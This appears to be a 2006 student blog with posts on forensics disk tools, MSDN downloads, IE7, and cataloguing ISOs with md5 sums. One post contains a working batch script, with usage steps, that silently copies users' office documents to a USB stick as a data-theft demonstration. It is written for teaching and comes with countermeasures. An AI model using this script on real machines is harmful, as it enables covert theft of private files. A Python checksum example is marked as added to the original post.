Saturday, October 14, 2006

As a computer security student, and with computer forensics apparently a fairly important part of the field, it's something we learn. Most of our texts recommend the use of FAT hard drives and moderately hacked versions of MS-DOS for forensics work.

For the former, modern Windows versions cap the maximum size you can format a FAT drive to (though they read larger ones fine). One option is to use Linux, but http://www.ridgecrop.demon.co.uk/index.htm?fat32format.htm is a lovely little tool that will format large FAT drives in Windows.

The other tool is a free app that allows hex editing of disks, for when you need to hack up an io.sys to disable disk compression when making a boot disk for forensics (granted that the *smart* thing would be to use a custom FreeDOS distro and release the code for it):
http://www.roadkil.net/Sectedit.html

Wednesday, October 11, 2006

podslurp script

Slurp.bat
by Ravi Mohan

Purpose:
To create a simple proof-of-concept application that searches for office documents and copies them from a Windows computer to any removable storage device.
The point of this exercise is to demonstrate (qualitatively) how easy it is to carry out data theft with removable storage devices.

Method:

I utilised the Xcopy command with silent and recursive options for each filetype in a hardcoded target directory. I also suppressed any messages by piping the output to a standard text file that is deleted at the end of the process. The real purpose of the batch file is a one-click implementation of the use of the command over multiple filetypes, as well as not having any "obvious" output on the shell. *click* *click* is less obvious than *typetypetypetype* after all.

The most interesting thing about this is that all components used for this function exactly as they are designed to, and there is no real 'exploit' other than at the social level (i.e. getting access to a system with malicious intent).

I'd note this version was optimised for silent running and not reliability (and there's one situation that will hang up the download of files w/o any warning, since all warnings are redirected... try to find it). Some small tweaks to the batch script would add some logging capabilities, but I leave that as a (terribly simple) exercise to the reader. It also searches for each filetype recursively, and in addition to the time to copy, I suspect adding more filetypes would increase download time.

Anyone who understands what's being done could *easily* do this (took me 2 hours to perfect, mainly due to rusty DOS skills and trying to get it *totally* silent), but I strongly discourage use of this script or similar tools for illegal activities. It IS, however, a very vivid demonstration of how easy it is to steal data, since anyone with a moderate knowledge of the Windows command line could easily cook up a similar batch file. I personally made extensive use of the help function in producing it too!

tests:
The method was tested on a stock copy of Windows XP SP2 on a Packard Bell EasyNote R1938 with a 1.6 GHz processor, 1 GB RAM, and using USB 2.0 drives. The version of Windows was fully patched, in both admin and LUA. There wasn't any noticeable performance difference between USB/IDE drives and USB flash drives, though the amount of files on my system (~4 MB) was not large.

results:
All files of the target types in the user directory were copied.

howto
1) copy the slurp.bat file to your storage device (preferably off the target system)
2) create the "slurp" folder (you're free to change the name... but you'll need to edit the relevant parts of the script)
3) run slurp.bat
4) a blank black window will open, and when the transfer is done, will close
5) unplug drive and walk away

future enhancements:
see if it's possible to speed it up
test on a system-wide scale as opposed to the /user/ folder
check for traces left behind
see if I can get multiple filetypes in one line
dedicated programme for the job (though this setup is simpler and more powerful)

possible countermeasures:
possibly disable use of USB drives on systems with sensitive data
common sense

Acknowledgements: Abe Usher @ http://www.sharp-ideas.net, whose slurp-audit made me wonder if it was as easy as I thought it was. It's probably a better tool for security work than this, since it doesn't actually carry out the nasty bit of the process.

the actual script

@echo off
rem slurp file copying script by faileas
rem for educational purposes only, since it's so bloody simple anyway; anyone with DOS skills could work it out
rem notes: slurp assumes you have the correct directories created in the target drive. read and understand the commands!
rem slurp will find and download the filetypes listed. I don't think it's 100% efficient timewise,
rem but it's simple enough to memorise. The pipe out to empty.txt suppresses console messages, but might not always be necessary
rem for additional options try help xcopy
xcopy "c:\Documents and Settings"\*.doc \slurp\ /s /Q /y >empty.txt
xcopy "c:\Documents and Settings"\*.xls \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.pdf \slurp\ /s /Q /c /y > empty.txt
xcopy "c:\Documents and Settings"\*.rtf \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.txt \slurp\ /s /Q /c /y> empty.txt
xcopy "c:\Documents and Settings"\*.ppt \slurp\ /s /q /c /y > empty.txt
del empty.txt

Tuesday, October 10, 2006

Considering the sheer number of files I have on download (legit, I assure you, just every OS on MSDN, and ) and that I haven't quite decided how I want to store them (DVD, external HDD, remote file server) and so on, and that many of them have keys, which I will need (and I assume Windows keys don't expire!), I'm working on a rudimentary file listing for it. Looking at it now, in foresight:

1) I should be able to detect errors in files so I know they are good, especially where I am potentially going to transfer them between various systems and storage devices

2) should be relatively platform independent

3) should be as simple as possible

2/3 is settled by starting with a flat text file with clear labels, since I can export this to Excel, or possibly a database at some point, with a little find-and-replace fu (granted that I HAVE crashed Notepad with excessive use of this command), and most Unix/Linux systems manage the line-ending issue relatively well nowadays.

For 1:
1) I'd need a listing of the contents (simply), the ISO/folder file name (preferably keeping the original names, which are occasionally cryptic), and in the case of the former, an md5 sum would be helpful (considering it's widely used for the job)

If I were using a batch script to do this (not impossible, but not necessary unless you plan badly or need to do this sort of listing after the fact), I'd probably use the command-line md5sum software to do it, but in this case I'm using a shell extension called Digest It.

Another decision I need to make, and which isn't made yet, is how to handle folders/directories, such as how XP Embedded is delivered. The 'ideal' solution would be self-extracting EXEs, since I wouldn't be tied to any software (but I would be tied down to an OS, which is a hitch) and I would have a unified way of handling everything, especially if I added a text file with serial numbers to a folder with each ISO and compressed it.
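The listing format sketched above (flat text with clear labels, an md5 sum per image, folders handled by storing paths relative to the archive root), as an added example that is not from the original post: a small Python script that builds the listing, parses it back, and verifies the files after a transfer. It runs on constructed sample files in a temporary directory; the file names vista_rtm.iso and xp_embedded/disc1.iso are made up.

```python
import hashlib
import os
import tempfile
def md5_of_file(path, chunk=1 << 20):
    # Hash in 1 MB chunks so a multi-GB ISO never has to fit in memory.
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def build_listing(root):
    # One line per file: tab-separated label=value fields, path relative to root, sorted.
    lines = []
    for full in (os.path.join(d, n) for d, _, names in os.walk(root) for n in names):
        rel = os.path.relpath(full, root).replace(os.sep, "/")
        lines.append("file=%s\tsize=%d\tmd5=%s" % (rel, os.path.getsize(full), md5_of_file(full)))
    return "\n".join(sorted(lines)) + "\n"

def parse_listing(text):
    entries = {}  # {relative name: {label: value}}, the inverse of build_listing
    for line in text.splitlines():
        if line.strip():
            fields = dict(f.split("=", 1) for f in line.split("\t"))
            entries[fields["file"]] = fields
    return entries

def verify(root, saved_listing):
    # Re-hash everything under root; report files that changed, vanished or appeared.
    expected = parse_listing(saved_listing)
    actual = parse_listing(build_listing(root))
    problems = {n: "missing" for n in expected if n not in actual}
    for n, act in actual.items():
        if n not in expected:
            problems[n] = "not in listing"
        elif act["md5"] != expected[n]["md5"]:
            problems[n] = "md5 mismatch"
    return problems

def demo():
    # Constructed sample: two tiny stand-ins for ISOs (one in a folder); the first is then damaged.
    root = tempfile.mkdtemp()
    os.mkdir(os.path.join(root, "xp_embedded"))
    for rel, data in (("vista_rtm.iso", b"image 1"), ("xp_embedded/disc1.iso", b"image 2")):
        with open(os.path.join(root, rel), "wb") as f:
            f.write(data)
    saved = build_listing(root)
    with open(os.path.join(root, "vista_rtm.iso"), "ab") as f:
        f.write(b"\x00")  # simulate a bad transfer: one byte appended
    return verify(root, saved)  # {'vista_rtm.iso': 'md5 mismatch'}
```

Save the output of build_listing next to the images; after copying the set to a new disk, verify against that saved text to catch any image that did not survive the transfer intact.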

planning to store files is hard work :)

Ref: http://www.openoffice.org/dev_docs/using_md5sums.html#links, where I got the links for md5 summing from.

MSDN AA tips

1) The download count for "free" (gratis, not libre) software is for the software downloader. Backing them up (as opposed to backing up the whole file) might be a good way to back up software downloaded from them when you have a valid account. I do not know how it works when the subscription runs out, though. You can ask your admin for a reset, though.

2) The download manager they use is pretty decent; it's reliable and fast. I'm impressed.

3) Predictably, the website fails with FF (Firefox) when downloading the download manager for each file. Use IE in this case.

4) If you lose a downloaded download manager (I back them up off-system), your admin (in my case my faculty helpdesk) can reset it for you.

5) Install keys are accessible through the MSDN website.

standalone browsers

Right, as some of you might know, and some of you *will* know now, Microsoft is *pushing* out IE 7 sometime this month in the updates. If you do *not* want this update, don't download it.
However, if you want IE7 (or have had IE7 pushed onto your system already) but have a few apps that will only run on IE 6, you can download a standalone version: the NT versions (ie6eolas_nt.zip is IE6, but you have the option of installing an older version if you wish; they run independently of each other, so you can see how craptastic your site looks on IE1).

Personally, I haven't decided if I will upgrade (with all of TWO websites needing IE for me, MSDN and my bank, and I'm not 100% positive my bank will work on IE7).

related links
IE7 pushed out on automatic updates IEBlog
IE7 fast approaching IEBlog (has resources on migration to IE7)
(Edit: fixed links)

Sunday, August 27, 2006

Right. New blog up. Test.